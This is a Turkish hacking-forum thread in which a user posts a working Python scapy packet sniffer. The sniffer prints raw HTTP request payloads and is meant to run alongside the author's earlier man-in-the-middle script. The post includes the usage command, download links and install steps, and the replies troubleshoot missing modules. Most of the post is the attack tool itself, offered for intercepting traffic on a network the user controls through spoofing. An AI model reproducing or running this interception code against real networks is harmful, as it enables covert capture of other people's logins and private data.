THT DUYURU

chat
Python Artificial Intelligence’da en çok kullanılan dildir ve gerekli dökümanların paylaşım alanlar burada paylaşılmaktadır.

ugursuz reklam
takipci
Seçenekler

paket dinleyici(man in the middle)

RoboKod - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
02/2019
Mesajlar:
18
Konular:
3
Teşekkür (Etti):
5
Teşekkür (Aldı):
7
Ticaret:
(0) %
6
3471
21-04-2019 12:30
#1
Selamunaleyküm

bir önceki konumda ortadaki adam olmuştuk fakat paketleri okuyamamıştık,
şimdi ise bizim bilgisayardan geçen paketleri okkumak için bir paket dinleyici yapacağız.

kodlarımız:
Kod:
import scapy.all as scapy
from scapy_http import http
import optparse
def girdi():
	parse=optparse.OptionParser()
	parse.add_option("-a",dest="agismi",help="lütfen dinlenilmesini istediğiniz ağ ismini giriniz")
	option=parse.parse_args()[0]
	return option
def paketler(interface):

    scapy.sniff(iface=interface,store=False,prn=analiz)


def analiz(packet):

    if packet.haslayer(http.HTTPRequest):
        if packet.haslayer(scapy.Raw):
            print(packet[scapy.Raw].load)

userinput=girdi()
a=userinput.agismi
paketler(a)
kullanımı cmd:
paketdinleyici.py -a "dinlenilmek istenilen ağ adı örnek: ech0"

paketlerin dinlenilmesi için diğer python dosyamız olan maninthemiddle.py ile birlikte çalışması lazım..

proje dosyası-paket dinleyici-
https://yadi.sk/d/6KeR26P8dMTV8Q
bir önceki konu ve mananthemidle proje dosyası:
https://www.turkhackteam.org/python/...themiddle.html


gerekli modüller:
scapy : pip install scapy
optparse : pip install optparse-pretty
scapy_http : pip install scapy-http


umarım yararlı olur.

Allah 'a emanet olun
selamunaleyküm
---------------------
Kod:
"Hak geldi, batıl zail oldu"

Konu PALA tarafından (21-04-2019 13:40 Saat 13:40 ) değiştirilmiştir.
cashback, BloodFallen, Hichigo Teşekkür etti.
TheWinson - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
04/2019
Mesajlar:
38
Konular:
12
Teşekkür (Etti):
6
Teşekkür (Aldı):
6
Ticaret:
(0) %
13-05-2019 01:30
#2
No modules error hatasını alıyorum çözümü nedir kullandığım sürüm en son sürüm
--------------------- Python : %79
Html : %20
Linux : %90
DemirBeY10 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
07/2017
Nereden:
Pasifik
Mesajlar:
239
Konular:
22
Teşekkür (Etti):
14
Teşekkür (Aldı):
53
Ticaret:
(0) %
13-05-2019 01:44
#3
Alıntı:
TheWinson´isimli üyeden Alıntı Mesajı göster
No modules error hatasını alıyorum çözümü nedir kullandığım sürüm en son sürüm
Python modülünü kütüphaneye indirdinmi hocam
--------------------- Uyuyan Milletler Ya Ölür Ya da Köle Olarak Uyanır


☾☆ 𐰤𐰀∶𐰢𐰆𐱃𐰞𐰆∶𐱅𐰇𐰼𐰜𐰢∶𐰓𐰃𐰘𐰤𐰀 ☾☆
☾☆ ALGAN ☾☆
TheWinson - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
04/2019
Mesajlar:
38
Konular:
12
Teşekkür (Etti):
6
Teşekkür (Aldı):
6
Ticaret:
(0) %
13-05-2019 23:38
#4
Alıntı:
DemirBeY10´isimli üyeden Alıntı Mesajı göster
Python modülünü kütüphaneye indirdinmi hocam
Hayır hocam indirmedim ve nasıl inidirildiğinide bilmiyorum yardımcı olursanız sevinirim.
--------------------- Python : %79
Html : %20
Linux : %90
P4RS - ait Kullanıcı Resmi (Avatar)
Purple Team Lideri
Üyelik tarihi:
01/2017
Nereden:
Balkes
Yaş:
19
Mesajlar:
4.923
Konular:
559
Teşekkür (Etti):
1501
Teşekkür (Aldı):
2994
Ticaret:
(0) %
14-05-2019 00:27
#5
Alıntı:
TheWinson´isimli üyeden Alıntı Mesajı göster
Hayır hocam indirmedim ve nasıl inidirildiğinide bilmiyorum yardımcı olursanız sevinirim.
Merhabalar,

Bkz;
---------------------



purple-team@turkhackteam.org

RoboKod - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
02/2019
Mesajlar:
18
Konular:
3
Teşekkür (Etti):
5
Teşekkür (Aldı):
7
Ticaret:
(0) %
14-05-2019 01:31
#6
Alıntı:
TheWinson´isimli üyeden Alıntı Mesajı göster
Hayır hocam indirmedim ve nasıl inidirildiğinide bilmiyorum yardımcı olursanız sevinirim.
scapy : pip install scapy
optparse : pip install optparse-pretty
scapy_http : pip install scapy-http

modülleri yukarıdaki gibi cmd ye (windows) veya terminal (linüx) yazacaksın o yükler modülü
örnek: pip install scapy
linüx kullanıyorsan:
---------------------
Kod:
"Hak geldi, batıl zail oldu"

Hasario - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
12/2018
Mesajlar:
135
Konular:
26
Teşekkür (Etti):
8
Teşekkür (Aldı):
16
Ticaret:
(0) %
15-05-2019 22:05
#7
Alıntı:
TheWinson´isimli üyeden Alıntı Mesajı göster
No modules error hatasını alıyorum çözümü nedir kullandığım sürüm en son sürüm
pip indirip ordan kutuphaneyı ındırmen lazım
--------------------- TEKİZ KENDİMİZEDE YETERİZ AMA BİR ELİN PARMAĞINIDA GEÇMESİNİDE BİLİRİZ.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler